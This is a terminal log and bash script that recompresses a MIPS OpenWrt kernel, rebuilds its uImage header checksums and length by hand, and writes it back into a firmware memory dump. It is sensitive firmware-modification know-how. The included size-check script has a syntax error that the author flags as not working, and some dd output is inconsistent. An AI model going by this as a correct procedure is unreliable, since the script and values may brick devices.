>>> ../lzma e 50040 -lc1 -lp2 -pb2 -mc100 50040.lzma
LZMA 4.65 : Igor Pavlov : Public domain : 2009-02-03
Script to reduce File Size to fit:
#!/bin/bash
# File to consider
INPUTFILE=$1
OUTPUTFILE="${INPUTFILE}.lzma"
#MAXSIZE=$((0x16611C - 0x50040))
MAXSIZE=$2
for i in {1..100}; do
echo "Trying $i";
../lzma e $INPUTFILE -lc1 -lp2 -pb2 -mc$i $OUTPUTFILE
#Check size
# Get file size
FILESIZE=$(stat -c%s "$OUTPUTFILE")
# Checkpoint
echo "Size of $INPUTFILE = $FILESIZE bytes."
echo "Max size is $MAXSIZE bytes."
# The following doesn't work
if [ $FILESIZE -gt $MAXSIZE)) ]; then
echo "nope"
else
echo "fine"
break
fi
done
Modifying the uImage Header:
#Copy Old Header
>>> dd if=../origional_memory.bin of=50000 bs=1 skip=$((0x50000)) count=$((0x40))
64+0 records in
64+0 records out
64 bytes copied, 0.0210238 s, 3.0 kB/s
#Calculate the new Data Checksum of the compressed kernel
└──╼ $crc32 50040.lzma
7fde2b33
#Remove the Data and Header Checksum
>>> dd if=/dev/zero of=50000_nocrc bs=1 seek=4 count=4 conv=notrunc
>>> dd if=/dev/zero of=50000_nocrc bs=1 seek=24 count=4 conv=notrunc
>>> xxd 50000_nocrc
00000000: 2705 1956 0000 0000 57d7 8502 0011 60dc '..V....W.....`.
00000010: 8000 0000 8000 0000 0000 0000 0505 0203 ................
00000020: 4d49 5053 204f 7065 6e57 7274 204c 696e MIPS OpenWrt Lin
00000030: 7578 2d33 2e31 382e 3336 0000 0000 0000 ux-3.18.36......
# Add crc Data Header
>>> xxd 50000_nocrc
00000000: 2705 1956 0000 0000 57d7 8502 0011 60dc '..V....W.....`.
00000010: 8000 0000 8000 0000 7fde 2b33 0505 0203 ..........+3....
00000020: 4d49 5053 204f 7065 6e57 7274 204c 696e MIPS OpenWrt Lin
00000030: 7578 2d33 2e31 382e 3336 0000 0000 0000 ux-3.18.36......
#Update the Image length
>>> ls -al 50040.lzma
-rw-r--r-- 1 502 dialout 1138893 Jul 8 15:04 50040.lzma
>>> xxd 50000_newcrc
00000000: 2705 1956 0000 0000 57d7 8502 0011 60cd '..V....W.....`.
00000010: 8000 0000 8000 0000 7fde 2b33 0505 0203 ..........+3....
00000020: 4d49 5053 204f 7065 6e57 7274 204c 696e MIPS OpenWrt Lin
00000030: 7578 2d33 2e31 382e 3336 0000 0000 0000 ux-3.18.36......
#Calculate the Header crc
>>> crc32 50000_newcrc
7a3ceeb3
#Add the CRC Header
>>> xxd 50000_newcrc
00000000: 2705 1956 7a3c eeb3 57d7 8502 0011 60cd '..Vz<..W.....`.
00000010: 8000 0000 8000 0000 7fde 2b33 0505 0203 ..........+3....
00000020: 4d49 5053 204f 7065 6e57 7274 204c 696e MIPS OpenWrt Lin
00000030: 7578 2d33 2e31 382e 3336 0000 0000 0000 ux-3.18.36......
Add uImage Header to file:
#Check File for all of the
>>> binwalk _memory.bin.extracted/50000_newcrc
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 uImage header, header size: 64 bytes, header CRC: 0x7A3CEEB3, created: 2016-09-13 04:48:02, image size: 1138893 bytes, Data Address: 0x80000000, Entry Point: 0x80000000, data CRC: 0x7FDE2B33, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: "MIPS OpenWrt Linux-3.18.36"
#Merge New Kernel with Old Header
>>> cat 50000_newcrc 50040.lzma > mod_uimage.bin
Merge the image into the firmware:
#Clear data before write
>>> dd if=/dev/zero of=memory.bin bs=1 seek=$((0x50000)) count=$((0x16611C - 0x50000)) conv=notrunc
1133173 bytes (1.1 MB, 1.1 MiB) copied, 99 s, 11.4 kB/s
1138972+0 records in
1138972+0 records out
1138972 bytes (1.1 MB, 1.1 MiB) copied, 99.501 s, 11.4 kB/s
#Write new kernel
>>> dd if=_memory.bin.extracted/mod_uimage.bin of=memory.bin bs=1 seek=$((0x50000)) conv=notrunc